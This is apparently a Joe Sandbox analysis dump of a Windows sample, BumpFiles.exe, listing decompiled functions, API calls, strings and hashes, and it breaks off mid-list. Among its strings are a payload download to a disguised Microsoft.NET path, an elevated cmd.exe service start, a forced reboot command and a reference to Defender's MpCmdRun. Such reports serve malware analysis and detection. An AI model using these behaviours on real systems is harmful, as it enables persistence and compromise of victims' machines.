Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: 8Q@
API String ID: 3192549508-4538559
Opcode ID: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
Instruction ID: 5c24eb5a0224f0d0217dee170c32e69bb12a0157d27a806c2dea3ea9b843178a
Opcode Fuzzy Hash: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
Instruction Fuzzy Hash: 5A41BF74204201AFD720DF14D884B6BB7E6EB89314F5449BEE844AB392C738EC81CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040907A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004090E6
UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000907C), ref: 00409123

Strings

8Q@, xrefs: 0040914E

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: 8Q@
API String ID: 3192549508-4538559
Opcode ID: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
Instruction ID: 3f5640ce620659ae70755be411fdbb9ab37924059e896462e0bf5bb31e75aaa3
Opcode Fuzzy Hash: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
Instruction Fuzzy Hash: D0316174704201AFF320DB24C988F27B7E6EB89714F55856EF5449B392C779EC80CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00431BFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(00422164,00000001), ref: 00431C18
GetCPInfo.KERNEL32(00431CFC,?,00422164,00000001), ref: 00431C39

Strings

dB, xrefs: 00431C4A

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Info
String ID: dB
API String ID: 1807457897-4186906907
Opcode ID: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
Instruction ID: e5a0a06e1b2316e04b0ed604c2c2d8d31d3c5bbf7ca71c3f0e9c3581ed2bfd2c
Opcode Fuzzy Hash: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
Instruction Fuzzy Hash: 460149716417048FC720EF6AE941997B7E8AF08354B00993FFC95C7351EB39E8008BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00429308 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004,004C0A6C,00000000), ref: 0042932C
LocalFree.KERNEL32(00000001,00429385,00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004), ref: 00429378

Strings

j$L, xrefs: 0042930B

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: j$L
API String ID: 1427518018-881032185
Opcode ID: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
Instruction ID: a4427651f3d97b25f843a57d3278f1a4ed8704c5c77d1cef0145a63058bfea89
Opcode Fuzzy Hash: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
Instruction Fuzzy Hash: ED012630744214AEE728D695AC12FBF369EE7CCB00FE0406BB900D62C0DA7C9D108268

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BumpFiles.exePID: 7380, Parent PID: 7296COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1517
Total number of Limit Nodes:	27

Executed Functions

Function 0040D51C Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D54E
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D557

Part of subcall function 0040D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
Part of subcall function 0040D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
Instruction ID: 8863e0a287c16cdc3c28c396c55d2e72c7f1b10b95ecf773108c4199bfcc3fe4
Opcode Fuzzy Hash: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
Instruction Fuzzy Hash: 5A114870A002099BDB04EF95C892AAEB7B5EF48304F50447BF904B73D2DB389E058A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3E4 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D008 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A

Strings

Software\CodeGear\Locales, xrefs: 0040D0C0, 0040D0DE
Software\Borland\Delphi\Locales, xrefs: 0040D11A
Software\Borland\Locales, xrefs: 0040D0FC
Software\Embarcadero\Locales, xrefs: 0040D080, 0040D0A2

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00639740 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 148
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042547C: DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
Part of subcall function 0042547C: GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
Part of subcall function 0042547C: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
Part of subcall function 0042547C: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE

Part of subcall function 0042D8FC: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,006398D3,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 0042D925

MoveFileW.KERNEL32(00000000,00000000), ref: 00639902
Sleep.KERNEL32(0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C,00000000,00633AEE), ref: 00639909

Part of subcall function 00633BD8: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30

Part of subcall function 0063586C: Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
Part of subcall function 0063586C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
Part of subcall function 0063586C: Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898

Sleep.KERNEL32(0000012C,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C), ref: 00639956

Strings

web2, xrefs: 006397BB
\Microsoft\Crypto\Keys\bin01.zip, xrefs: 006398D6
web1, xrefs: 006397A5
MpCmdRun, xrefs: 006397F4
.exe, xrefs: 00639914
Fairfield Burn, xrefs: 00639779
web3, xrefs: 006397D1
bin01.zip, xrefs: 006398EC
appdata, xrefs: 006398C9
:c, xrefs: 006397F1, 00639911
hWe, xrefs: 00639820

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$File$AttributesDeleteDirectoryEnvironmentErrorExecExecuteLastMoveRemoveShellVariable
String ID: .exe$Fairfield Burn$MpCmdRun$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$hWe$web1$web2$web3$:c
API String ID: 482055496-2407289723
Opcode ID: e08882b543d098c50bffb93050039ce0a2efc1e4e49cdd91ce1706b7f03e5d56
Instruction ID: 6a08d19c26d714fab50d671978c63310f8441c2b808e462788730ff630382bdb
Opcode Fuzzy Hash: e08882b543d098c50bffb93050039ce0a2efc1e4e49cdd91ce1706b7f03e5d56
Instruction Fuzzy Hash: A2511034A002089FCB04EB95D89299EB7B6FF49304F50457AF501BB3A1CA78AD11CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410844 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC

Strings

lld, xrefs: 004108BE
Lld, xrefs: 00410859

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: ExceptionRaise
String ID: Lld$lld
API String ID: 3997070919-3762902296
Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCD4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD

Strings

en-GB,en,en-US,, xrefs: 0040CD02, 0040CDA9

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-GB,en,en-US,
API String ID: 975949045-3021119265
Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE

Uniqueness

Uniqueness Score: -1.00%

Function 00633404 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 65
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsUserAnAdmin.SHELL32 ref: 00633424
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4

Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32

Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9

Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6

Strings

FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F
C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
API String ID: 3215071381-4060426360
Opcode ID: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
Opcode Fuzzy Hash: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
